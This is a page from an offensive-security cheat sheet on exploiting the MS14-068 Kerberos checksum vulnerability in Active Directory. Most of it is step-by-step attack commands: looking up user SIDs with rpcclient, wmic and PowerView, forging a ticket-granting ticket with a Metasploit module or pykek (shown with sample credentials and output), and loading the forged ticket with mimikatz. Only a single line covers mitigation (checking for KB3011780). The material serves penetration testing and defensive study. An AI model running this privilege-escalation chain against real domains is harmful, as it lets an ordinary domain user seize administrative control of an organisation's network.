ms14-068.md (4212B)
1 --- 2 title: "MS14-068 Checksum Validation" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/CVE/MS14-068.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/MS14-068.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # MS14-068 Checksum Validation 12 13 This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. 14 15 * RPCClient 16 17 ```powershell 18 rpcclient $> lookupnames john.smith 19 john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) 20 ``` 21 22 * WMI 23 24 ```powershell 25 wmic useraccount get name,sid 26 Administrator S-1-5-21-3415849876-833628785-5197346142-500 27 Guest S-1-5-21-3415849876-833628785-5197346142-501 28 Administrator S-1-5-21-297520375-2634728305-5197346142-500 29 Guest S-1-5-21-297520375-2634728305-5197346142-501 30 krbtgt S-1-5-21-297520375-2634728305-5197346142-502 31 lambda S-1-5-21-297520375-2634728305-5197346142-1110 32 ``` 33 34 * Powerview 35 36 ```powershell 37 Convert-NameToSid high-sec-corp.localkrbtgt 38 S-1-5-21-2941561648-383941485-1389968811-502 39 ``` 40 41 * netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid` 42 43 ```bash 44 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 45 ``` 46 47 Generate a ticket with `metasploit` or `pykek` 48 49 ```powershell 50 Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum 51 Name Current Setting Required Description 52 ---- --------------- -------- ----------- 53 DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL 54 PASSWORD P@ssw0rd yes The Domain User password 55 RHOSTS 10.10.10.10 yes The target address range or CIDR identifier 56 RPORT 88 yes The target port 57 Timeout 10 yes The TCP timeout to establish connection and read data 58 USER lambda yes The Domain User 59 USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 60 ``` 61 62 ```powershell 63 # Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek 64 $ git clone https://github.com/SecWiki/windows-kernel-exploits 65 $ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword> 66 $ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org 67 $ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 68 $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 69 -1105 70 [+] Building AS-REQ for msfdc01.metasploitable.local... Done! 71 [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! 72 [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! 73 [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! 74 [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! 75 [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! 76 [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! 77 [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! 78 [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! 79 ``` 80 81 Then use `mimikatz` to load the ticket. 82 83 ```powershell 84 mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" 85 ``` 86 87 ## Mitigations 88 89 * Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780 90 91 ## References 92 93 * [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)